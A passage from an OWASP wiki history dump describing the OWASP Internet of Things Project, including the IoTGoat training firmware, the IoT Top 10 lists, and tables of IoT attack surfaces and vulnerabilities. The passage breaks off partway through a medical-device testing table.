| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* Paulino Calderon<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248643OWASP Internet of Things Project2019-03-12T03:22:36Z<p>Aaron.guzman: /* What is the ICS/SCADA Project? */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
